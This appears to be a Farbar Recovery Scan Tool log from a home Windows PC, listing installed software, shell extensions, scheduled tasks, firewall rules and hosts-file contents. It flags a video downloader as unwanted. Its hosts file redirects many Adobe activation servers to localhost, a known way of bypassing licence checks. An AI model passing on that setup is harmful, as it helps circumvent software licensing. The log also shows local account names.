Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{5BABDA39-61CF-41EE-992D-4054B6649A9B}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{ED6C77F9-4D7E-447C-9EC0-9A212D075535}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 55.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 55.0 (x86 en-US)) (Version: 55.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 55.0.0.6417 - Mozilla)
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
NVIDIA Graphics Driver 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 331.65 - NVIDIA Corporation)
NVIDIA Update 1.11.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 1.11.3 - NVIDIA Corporation)
Photobook Designer (HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Photobook Designer) (Version: Photobook Designer 2015.2.0 - Photobook Worldwide)
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 11.1.005 - Dell Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6782 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.2.8400.39034 - Realtek Semiconductor Corp.)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Speed Wi-Fi Next setting tool (HKLM-x32\...\Speed Wi-Fi Next setting tool) (Version: 22.001.26.09.824 - Huawei Technologies Co.,Ltd)
VLC media player 2.0.1 (HKLM-x32\...\VLC media player) (Version: 2.0.1 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)
WinRAR 4.10 beta 5 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.10.5 - win.rar GmbH)
YTD Video Downloader 5.8.1 (HKLM-x32\...\{1a413f37-ed88-4fec-9666-5c48dc4b7bb7}) (Version: 5.8.1 - GreenTree Applications SRL) <==== ATTENTION
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> No File
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> No File
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {D25B2CAB-8A9A-4517-A9B2-CB5F68A5A802} => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\..\Acrobat Elements\ContextMenu64.dll [2015-09-24] (Adobe Systems Inc.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2011-12-15] ()
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2011-12-15] ()
ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2011-12-15] ()
ContextMenuHandlers4-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2011-12-15] ()
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2014-10-01] (Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2013-10-23] (NVIDIA Corporation)
ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {D25B2CAB-8A9A-4517-A9B2-CB5F68A5A802} => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\..\Acrobat Elements\ContextMenu64.dll [2015-09-24] (Adobe Systems Inc.)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2011-12-15] ()
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2011-12-15] ()
ContextMenuHandlers1_S-1-5-21-1090255531-1958037965-2896169239-1004: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ContextMenuHandlers4_S-1-5-21-1090255531-1958037965-2896169239-1004: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ContextMenuHandlers5_S-1-5-21-1090255531-1958037965-2896169239-1004: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {05979ED8-D504-4FC3-B767-7A72D6724171} - System32\Tasks\G2MUpdateTask-S-1-5-21-1090255531-1958037965-2896169239-1002 => C:\Users\Gaya\AppData\Local\Citrix\GoToMeeting\2033\g2mupdate.exe [2014-12-01] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {2E3F8A43-FD80-4A2E-B524-A66101B0A12D} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1002Core => C:\Users\Gaya\AppData\Local\Google\Update\GoogleUpdate.exe [2013-11-13] (Google Inc.)
Task: {32C9F50E-F2D2-4052-9F6D-5C43C065A6DB} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1004UA => C:\Users\Ligaya\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {451D0C7C-D7CF-492A-9D34-2BE6DED90418} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-01-13] (Microsoft Corporation)
Task: {466133FD-CFCA-4397-84CD-D7B517340EB1} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1004UA => C:\Users\Ligaya\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {589BFC50-0D3F-48DE-9286-0BDA88A52166} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1002UA => C:\Users\Gaya\AppData\Local\Google\Update\GoogleUpdate.exe [2013-11-13] (Google Inc.)
Task: {5DACBB75-34B8-42E1-804C-E791CFE2CAA4} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-08-09] (Adobe Systems Incorporated)
Task: {5F45B210-325D-4CAB-A7CC-77DC3C9873D2} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {74ECF951-866D-4D9F-9C01-3CFA34413B17} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-01-13] (Microsoft Corporation)
Task: {76CEF2C8-8C92-4BD7-80C2-4D938BBB1D11} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1004Core => C:\Users\Ligaya\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {89A968BA-E516-45A8-9C98-0AD1F559C151} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1004Core => C:\Users\Ligaya\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {957D11B3-75EB-4E78-BEB5-D7176B223FAA} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {ADC8BC3B-B7F6-4082-875E-FA8AE67AA71A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-01-13] (Microsoft Corporation)
Task: {AE0E7356-B06C-4F92-A374-88A89C8530AE} - System32\Tasks\G2MUpdateTask-S-1-5-21-1090255531-1958037965-2896169239-1004 => C:\Users\Ligaya\AppData\Local\GoToMeeting\7469\g2mupdate.exe
Task: {B0525F06-4717-41D3-A23A-A48832A5409C} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: {C41D3040-1B2F-4FDB-B00F-CAA2DE0CAE28} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-01-13] (Microsoft Corporation)
Task: {CAD0D960-7344-47CA-939A-A25A06B600E4} - System32\Tasks\G2MUploadTask-S-1-5-21-1090255531-1958037965-2896169239-1004 => C:\Users\Ligaya\AppData\Local\GoToMeeting\7469\g2mupload.exe
Task: {D2319554-68C3-4096-8599-B7EE339372B3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-07-19] (Adobe Systems Incorporated)
Task: {DAA30EB7-6E23-4993-9F91-0DAD848DFEE7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {DB13B1F7-805B-4932-BD20-2B3487FD3915} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\My Dell\uaclauncher.exe [2014-02-01] (PC-Doctor, Inc.)
Task: {E700329F-78B1-474B-9D25-42FB79C65A7D} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-02-01] (PC-Doctor, Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1004Core.job => C:\Users\Ligaya\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1004UA.job => C:\Users\Ligaya\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1002Core.job => C:\Users\Gaya\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1002UA.job => C:\Users\Gaya\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
==================== Loaded Modules (Whitelisted) ==============
 
2010-01-09 20:17 - 2010-01-09 20:17 - 004254560 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-01-21 01:40 - 2010-01-21 01:40 - 008794464 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2013-09-01 15:40 - 2011-12-15 12:38 - 000193536 _____ () C:\Program Files\WinRAR\rarext.dll
2017-08-18 12:16 - 2017-08-11 15:40 - 002692952 _____ () C:\Program Files (x86)\Google\Chrome\Application\60.0.3112.101\swiftshader\libglesv2.dll
2017-08-18 12:16 - 2017-08-11 15:40 - 000137048 _____ () C:\Program Files (x86)\Google\Chrome\Application\60.0.3112.101\swiftshader\libegl.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\WINDOWS\system32\Drivers\btmhsf.sys:Microsoft_Appcompat_ReinstallUpgrade [0]
AlternateDataStreams: C:\Users\Gaya\Desktop\IMG_20140804_123230.jpg:com.dropbox.attributes [320]
AlternateDataStreams: C:\Users\Ligaya\Desktop\TRAVEL.txt:com.dropbox.attributes [168]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="2"
e"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2012-07-26 13:26 - 2017-08-19 08:01 - 000001377 _____ C:\WINDOWS\system32\Drivers\etc\hosts
 
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com
127.0.0.1 adobe.activate.com
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1090255531-1958037965-2896169239-1001\Control Panel\Desktop\\Wallpaper -> 
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\Control Panel\Desktop\\Wallpaper -> 
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
MSCONFIG\Services: WSearch => 2
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKLM\...\StartupApproved\Run32: => "iTunesHelper"
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\StartupApproved\Run: => "Messenger (Yahoo!)"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{2A5E54A3-D77A-406B-AB1D-57AD4066E259}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{D2D32C57-5201-4CDF-970E-72AEE928F8B4}] => (Block) C:\program files (x86)\epson software\event manager\eeventmanager.exe
FirewallRules: [{5CD2A3BA-8670-4E2B-AFA3-EF2DA52F3CA0}] => (Block) C:\program files (x86)\epson software\event manager\eeventmanager.exe
FirewallRules: [UDP Query User{62409070-7EED-47D8-B14B-B63F6D4CA3F5}C:\program files (x86)\epson software\event manager\eeventmanager.exe] => (Allow) C:\program files (x86)\epson software\event manager\eeventmanager.exe
FirewallRules: [TCP Query User{35F61B25-E70E-4033-B9C9-429C18D128AE}C:\program files (x86)\epson software\event manager\eeventmanager.exe] => (Allow) C:\program files (x86)\epson software\event manager\eeventmanager.exe
FirewallRules: [{11DE205E-F74E-4C45-86CB-BB15C14DD7A0}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{8F574FE5-C560-4974-8B09-EC51F160CA60}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{398D04D3-2A2E-4C68-9614-79287E350821}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{E53A05F2-9410-4D63-A6D9-EE45B7253264}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{BCBBFB69-7CC8-480C-AAAA-419F10A1A401}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{0DD7777D-4853-4D41-9112-291ED89F639A}] => (Allow) C:\Users\Gaya\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [UDP Query User{F60B45C8-07F5-41BE-912A-F241D767C6F8}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{E3F6AC88-9000-4739-A886-F5CA8EDDB339}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{D39FA79C-150B-48E9-86B9-62CF6E078765}] => (Block) C:\users\gaya\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{85968215-8520-4771-81E8-146D1C4C3496}] => (Block) C:\users\gaya\appdata\roaming\utorrent\utorrent.exe
